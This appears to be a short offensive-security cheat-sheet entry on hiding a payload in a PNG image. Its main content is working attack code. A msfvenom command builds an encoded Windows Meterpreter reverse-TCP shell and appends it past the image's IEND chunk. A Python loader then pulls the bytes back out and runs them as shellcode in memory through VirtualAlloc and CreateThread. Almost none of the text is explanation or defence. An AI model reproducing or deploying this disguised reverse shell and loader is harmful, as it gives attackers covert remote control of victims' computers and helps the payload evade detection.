PNG Steganography
Embed a msfvenom payload inside a legitimate PNG file. The image opens normally but contains a hidden payload appended past the PNG IEND chunk.
Generate and embed
```bash
# 1. Generate encoded raw payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
    -e x86/shikata_ga_nai -i 3 -f raw > payload.raw

# 2. Append to PNG
cat payload.raw >> image.png
```
Verify embedding
```bash
# The IEND chunk should appear immediately before the appended payload bytes
strings image.png | tail -5
xxd image.png | tail -20
```
Extraction loader (Python)
```python
PNG_IEND = b'\x00\x00\x00\x00IEND\xaeB`\x82'

with open("image.png", "rb") as f:
    data = f.read()

idx = data.rfind(PNG_IEND)
if idx == -1:
    raise ValueError("No IEND chunk found")

shellcode = data[idx + len(PNG_IEND):]

import ctypes
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ptr, shellcode, len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
```